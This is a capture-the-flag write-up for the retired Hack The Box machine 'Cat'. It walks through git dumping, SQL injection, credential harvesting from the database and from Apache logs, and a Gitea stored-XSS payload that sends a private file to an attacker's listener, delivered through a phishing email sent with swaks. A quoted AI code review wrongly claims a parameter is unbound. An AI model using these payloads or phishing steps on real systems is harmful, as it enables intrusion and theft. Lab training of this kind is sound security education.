Cat Machine Info
OS	Linux
Difficulty	Medium
Status	Retired
Stars	3.5/5.0
Released	2025-02-01
Owns	User: 5,131 Root: 4,578
Times	User: 10H 56M 33S Root: 10H 58M 14S
My Rank	339

Enum

$ rustscan --ulimit 10000 -a <IP> -- -A
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-`
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
RustScan: Exploring the digital landscape, one IP at a time.
 
[~] Automatically increasing ulimit value to 10000.
Open <IP>:22
Open <IP>:80
 
PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 96:2d:f5:c6:f6:9f:59:60:e5:65:85:ab:49:e4:76:14 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC/7/gBYFf93Ljst5b58XeNKd53hjhC57SgmM9qFvMACECVK0r/Z11ho0Z2xy6i9R5dX2G/HAlIfcu6i2QD9lILOnBmSaHZ22HCjjQKzSbbrnlcIcaEZiE011qtkVmtCd2e5zeVUltA9WCD69pco7BM29OU7FlnMN0iRlF8u962CaRnD4jni/zuiG5C2fcrTHWBxc/RIRELrfJpS3AjJCgEptaa7fsH/XfmOHEkNwOL0ZK0/tdbutmcwWf9dDjV6opyg4IK73UNIJSSak0UXHcCpv0GduF3fep3hmjEwkBgTg/EeZO1IekGssI7yCr0VxvJVz/Gav+snOZ/A1inA5EMqYHGK07B41+0rZo+EZZNbuxlNw/YLQAGuC5tOHt896wZ9tnFeqp3CpFdm2rPGUtFW0jogdda1pRmRy5CNQTPDd6kdtdrZYKqHIWfURmzqva7byzQ1YPjhI22cQ49M79A0yf4yOCPrGlNNzeNJkeZM/LU6p7rNJKxE9CuBAEoyh0=
|   256 9e:c4:a4:40:e9:da:cc:62:d1:d6:5a:2f:9e:7b:d4:aa (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBEmL+UFD1eC5+aMAOZGipV3cuvXzPFlhqtKj7yVlVwXFN92zXioVTMYVBaivGHf3xmPFInqiVmvsOy3w4TsRja4=
|   256 6e:22:2a:6a:6d:eb:de:19:b7:16:97:c2:7e:89:29:d5 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIEOCpb672fivSz3OLXzut3bkFzO4l6xH57aWuSu4RikE
80/tcp open  http    syn-ack ttl 63 Apache httpd 2.4.41 ((Ubuntu))
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
| http-git:
|   <IP>:80/.git/
|     Git repository found!
|     Repository description: Unnamed repository; edit this file 'description' to name the...
|_    Last commit message: Cat v1
| http-cookie-flags:
|   /:
|     PHPSESSID:
|_      httponly flag not set
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Best Cat Competition

.git $\to$ Git-Dumper

$ python -m venv env
$ source env/bin/activate
$ pip install git-dumper
$ git-dumper http://cat.htb/.git cat
 
$ ls cat/
accept_cat.php  config.php   css             img          index.php  logout.php    vote.php  winners.php
admin.php       contest.php  delete_cat.php  img_winners  join.php   view_cat.php  winners
 
$ cat /cat/admin.php

<?php
session_start();
 
include 'config.php';
 
// Check if the user is logged in
if (!isset($_SESSION['username']) || $_SESSION['username'] !== 'axel') {
    header("Location: /join.php");
    exit();
}
 
*snip*

$ cat /cat/accept_cat.php

<?php
include 'config.php';
session_start();
 
if (isset($_SESSION['username']) && $_SESSION['username'] === 'axel') {
    if ($_SERVER["REQUEST_METHOD"] == "POST") {
        if (isset($_POST['catId']) && isset($_POST['catName'])) {
            $cat_name = $_POST['catName'];
            $catId = $_POST['catId'];
            $sql_insert = "INSERT INTO accepted_cats (name) VALUES ('$cat_name')";
            $pdo->exec($sql_insert);
 
            $stmt_delete = $pdo->prepare("DELETE FROM cats WHERE cat_id = :cat_id");
            $stmt_delete->bindParam(':cat_id', $catId, PDO::PARAM_INT);
            $stmt_delete->execute();
 
            echo "The cat has been accepted and added successfully.";
        } else {
            echo "Error: Cat ID or Cat Name not provided.";
        }
    } else {
        header("Location: /");
        exit();
    }
} else {
    echo "Access denied.";
}

Seems to check cookies for user “Axel” $\to$ XSS might do the trick
Deepseek R1:

1. **SQL Injection**:
   - The code directly uses user input (`$_POST['catId']` and `$_POST['catName']`) in SQL statements without
proper sanitization.
   - This allows an attacker to manipulate the SQL query, potentially leading to unauthorized database access
or modifications.
 
2. **Missing Parameter Binding**:
   - In the delete statement (`$stmt_delete->prepare("DELETE FROM cats WHERE cat_id = :cat_id"`), the
`:cat_id` parameter is not properly bound using `PDO::PARAM_INT`, which could allow injection if the input
isn`t validated as an integer.
 
3. **Lack of Input Validation**:
   - There`s no validation to ensure that `$_POST['catId']` and `$_POST['catName']` are numeric and within
acceptable ranges, making it easier for an attacker to manipulate the inputs.

Seems XSS $\to$ SQLi is the way

+-------------------------------+-------------------------------------------------------+----------+
| user_id | email | password | username |
+---------+-------------------------------+-------------------------------------------------------+----------+
| 1 | axel2017@gmail.com | d1bbba3670feb9435c9841e46e60ee2f | axel |
| 2 | rosamendoza485@gmail.com | ac369922d560f17d6eeb8b2c7dec498c (soyunaprincesarosa) | rosa |
| 3 | robertcervantes2000@gmail.com | 42846631708f69c00ec0c0a8aa4a92ad | robert |
| 4 | fabiancarachure2323@gmail.com | 39e153e825c4a3d314a0dc7f7475ddbe | fabian |
| 5 | jerrysonC343@gmail.com | 781593e060f8d065cd7281c5ec5b4b86 | jerryson |
| 6 | larryP5656@gmail.com | 1b6dce240bbfbc0905a664ad199e18f8 | larry |
| 7 | royer.royer2323@gmail.com | c598f6b844a36fa7836fba0835f1f6 | royer |
| 8 | peterCC456@gmail.com | e41ccefa439fc454f7eadbf1f139ed8a | peter |
| 9 | angel234g@gmail.com | 24a8ec003ac2e1b3c5953a6f95f8f565 | angel |
| 10 | jobert2020@gmail.com | 88e4dceccd48820cf77b5cf6c08698ad | jobert |
| 11 | asdf@adsf.com | 912ec803b2ce49e4a541068d495ab570 (asdf) | XSS CMD |
+---------+-------------------------------+-------------------------------------------------------+----------+

SSH as Rosa

$ ssh rosa@cat.htb
rosa@cat.htb`s password: 'soyunaprincesarosa'
 
rosa@cat:~$ ls /home
axel  git  jobert  rosa

Apache 2 server $\to$ Check logs

$ grep 'axel' /var/log/apache2 -R
*snip*

/var/log/apache2/access.log.1:127.0.0.1 -
GET /join.php?loginUsername=axel&loginPassword=aNdZwgC4tI9gnVXv_e3Q&loginForm=Login HTTP/1.1" 302 329 "http://cat.htb/join.php" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0

Creds

rosa : soyunaprincesarosa

axel : aNdZwgC4tI9gnVXv_e3Q

SSH as Axel $\to$ Check Mail

$ ssh axel@cat.htb
axel@cat.htb`s password: aNdZwgC4tI9gnVXv_e3Q
 
You have mail.
 
axel@cat:~$ ls
user.txt
 
axel@cat:~$ cat /var/mail/axel
 
From rosa@cat.htb  Sat Sep 28 04:51:50 2024
Subject: New cat services
 
Hi Axel,
 
We are planning to launch new cat-related web services, including a cat care website and other projects. Please send an email to jobert@localhost with information about your Gitea repository. Jobert will check if it is a promising service that we can develop.
 
Important note: Be sure to include a clear description of the idea so that I can understand it properly. I will review the whole repository.
 
From: rosa@cat.htb
Message-Id: <202409280505.48S55Sm0002267@cat.htb>
Subject: Employee management
 
We are currently developing an employee management system. Each sector administrator will be assigned a specific role, while each employee will be able to consult their assigned tasks. The project is still under development and is hosted in our private Gitea. You can visit the repository at: http://localhost:3000/administrator/Employee-management/. In addition, you can consult the README file, highlighting updates and other important details, at: http://localhost:3000/administrator/Employee-management/raw/branch/main/README.md.

Root

Check ports

axel@cat:~$ netstat -ano
 
tcp        0      0 127.0.0.1:3000          0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp        0      0 127.0.0.1:25            0.0.0.0:*               LISTEN      off (0.00/0/0)

Portfwd and access in browser

$ ssh -L 3000:127.0.0.1:3000 -L 25:127.0.0.1:25 axel@cat.htb

Can sign into Gitea as Axel

Pieces

“Please send an email to jobert@localhost with information about your Gitea repository. Jobert will check if it is a promising service that we can develop.”

http://localhost:3000/administrator/Employee-management/raw/branch/main/README.md

Gitea 1.22 XSS CVE-2024-6886

Sounds like we need to go phishing $\to$ Target index.php not README.md
Create repo and add XSS to description

<a href="javascript:fetch('http://localhost:3000/administrator/Employee-management/raw/branch/main/index.php').then(response => response.text()).then(data => fetch('http://<IP>:<PORT>/?response=' + encodeURIComponent(data))).catch(error => console.error('Error:', error));">PWNED??</a>

Phish Jobert $\to$ Catch in HTTP server (repo gets deleted quickly so spam it)

$ swaks --to "jobert@localhost" --from "axel@localhost" --header "Subject: pwned" --body "http://localhost:3000/axel/pwn" --server localhost --port 25 --timeout 10s
=== Trying localhost:25...
=== Connected to localhost.
<-  220 cat.htb ESMTP Sendmail 8.15.2/8.15.2/Debian-18; (No UCE/UBE) logging access from: localhost(OK)-localhost [127.0.0.1]
 -> EHLO kali
<-  250-cat.htb Hello localhost [127.0.0.1], pleased to meet you
<-  250-ENHANCEDSTATUSCODES
<-  250-PIPELINING
<-  250-EXPN
<-  250-VERB
<-  250-8BITMIME
<-  250-SIZE
<-  250-DSN
<-  250-ETRN
<-  250-AUTH DIGEST-MD5 CRAM-MD5
<-  250-DELIVERBY
<-  250 HELP
 -> MAIL FROM:<axel@localhost>
<-  250 2.1.0 <axel@localhost>... Sender ok
 -> RCPT TO:<jobert@localhost>
<-  250 2.1.5 <jobert@localhost>... Recipient ok
 -> DATA
<-  354 Enter mail, end with "." on a line by itself
 -> To: jobert@localhost
 -> From: axel@localhost
 -> Subject: pwned
 -> Message-Id: <20250203203439.043552@kali>
 -> X-Mailer: swaks v20240103.0 jetmore.org/john/code/swaks/
 ->
 -> http://localhost:3000/axel/pwn
 ->
 ->
 -> .
<-  250 2.0.0 5141Yd7W016129 Message accepted for delivery
 -> QUIT
<-  221 2.0.0 cat.htb closing connection
=== Connection closed with remote host.

# Response
 
GET /?response=%3C%3Fphp%0A%24valid_username%20%3D%20%27admin%27%3B%0A%24valid_password%20%3D%20%27IKw75eR0MR7CMIxhH0%27%3B%0A%0Aif%20(!isset(%24_SERVER%5B%27PHP_AUTH_USER%27%5D)%20%7C%7C%20!isset(%24_SERVER%5B%27PHP_AUTH_PW%27%5D)%20%7C%7C%20%0A%20%20%20%20%24_SERVER%5B%27PHP_AUTH_USER%27%5D%20!%3D%20%24valid_username%20%7C%7C%20%24_SERVER%5B%27PHP_AUTH_PW%27%5D%20!%3D%20%24valid_password)%20%7B%0A%20%20%20%20%0A%20%20%20%20header(%27WWW-Authenticate%3A%20Basic%20realm%3D%22Employee%20Management%22%27)%3B%0A%20%20%20%20header(%27HTTP%2F1.0%20401%20Unauthorized%27)%3B%0A%20%20%20%20exit%3B%0A%7D%0A%0Aheader(%27Location%3A%20dashboard.php%27)%3B%0Aexit%3B%0A%3F%3E%0A%0A HTTP/1.1 200 -
 
# URL Decode

<?php
$valid_username = 'admin';
$valid_password = 'IKw75eR0MR7CMIxhH0';
 
if (!isset($_SERVER['PHP_AUTH_USER']) || !isset($_SERVER['PHP_AUTH_PW']) ||
    $_SERVER['PHP_AUTH_USER'] != $valid_username || $_SERVER['PHP_AUTH_PW'] != $valid_password) {
 
    header('WWW-Authenticate: Basic realm="Employee Management"');
    header('HTTP/1.0 401 Unauthorized');
    exit;
}
 
header('Location: dashboard.php');
exit;
?>
 
HTTP/1.1" 200 -

su root

axel@cat:~$ su root
Password: IKw75eR0MR7CMIxhH0
 
root@cat:/home/axel: ls /root
root.txt  scripts

Home

Explorer

04-Cat

Enum

Root

Graph View

Table of Contents